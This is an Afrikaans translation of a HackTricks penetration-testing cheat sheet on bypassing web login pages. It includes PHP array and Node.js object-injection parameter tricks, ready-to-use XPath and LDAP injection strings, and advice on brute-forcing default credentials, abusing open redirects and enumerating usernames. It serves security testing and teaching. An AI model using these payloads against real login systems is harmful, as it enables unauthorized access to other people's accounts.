Login Bypass
Reading time: 4 minutes
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Om gereelde aanmelding te omseil
As jy 'n aanmeldbladsy vind, kan jy hier 'n paar tegnieke vind om dit te probeer omseil:
- Kyk vir kommentaar binne die bladsy (scroll af en na regs?)
- Kyk of jy direk toegang tot die beperkte bladsye kan kry
- Kyk om nie die parameters te stuur nie (stuur geen of net 1)
- Kyk na die PHP vergelykingsfout:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Verander inhoud tipe na json en stuur json waardes (bool true ingesluit)
- As jy 'n antwoord kry wat sê dat POST nie ondersteun word nie, kan jy probeer om die JSON in die liggaam te stuur maar met 'n GET versoek met
Content-Type: application/json
- Kyk na nodejs se potensiële ontledingsfout (lees hierdie):
password[password]=1
- Nodejs sal daardie payload omskep na 'n navraag soortgelyk aan die volgende:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
wat maak dat die wagwoord altyd waar is. - As jy 'n JSON objek kan stuur, kan jy
"password":{"password": 1}
stuur om die aanmelding te omseil. - Onthou dat jy om hierdie aanmelding te omseil steeds moet weet en 'n geldige gebruikersnaam stuur.
- Voeg
"stringifyObjects":true
opsie by wanneer jymysql.createConnection
aanroep, sal uiteindelik alle onverwagte gedrag blokkeer wanneerObject
in die parameter gestuur word. - Kyk na geloofsbriewe:
- Standaard geloofsbriewe van die tegnologie/platform wat gebruik word
- Gewone kombinasies (root, admin, wagwoord, naam van die tegnologie, standaard gebruiker met een van hierdie wagwoorde).
- Skep 'n woordeboek met Cewl, voeg die standaard gebruikersnaam en wagwoord (indien daar is) by en probeer om dit te brute-force met al die woorde as gebruikersname en wagwoord
- Brute-force met 'n groter woordeboek (Brute force)
SQL Injection aanmeld omseiling
Hier kan jy verskeie truuks vind om die aanmelding via SQL injections te omseil.
Op die volgende bladsy kan jy 'n aangepaste lys vind om te probeer om die aanmelding via SQL Injections te omseil:
Geen SQL Injection aanmeld omseiling
Hier kan jy verskeie truuks vind om die aanmelding via Geen SQL Injections te omseil.
Aangesien die NoSQL Injections vereis dat die parameterwaarde verander word, sal jy dit handmatig moet toets.
XPath Injection aanmeld omseiling
Hier kan jy verskeie truuks vind om die aanmelding via XPath Injection. te omseil
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection outentieke bypass
Hier kan jy verskeie truuks vind om die aanmelding via LDAP Injection te omseil.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Onthou My
As die bladsy "Onthou My" funksionaliteit het, kyk hoe dit geïmplementeer is en sien of jy dit kan misbruik om ander rekeninge oor te neem.
Oorplasings
Bladsye herlei gewoonlik gebruikers na aanmelding, kyk of jy daardie oorplasing kan verander om 'n Open Oorplasing te veroorsaak. Miskien kan jy 'n paar inligting (kodes, koekies...) steel as jy die gebruiker na jou webwerf herlei.
Ander Kontroles
- Kyk of jy gebruikernames kan opnoem deur die aanmeldfunksionaliteit te misbruik.
- Kyk of outo-voltooi aktief is in die wagwoord/sensitiewe inligting vorms invoer:
<input autocomplete="false">
Outomatiese Gereedskap
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.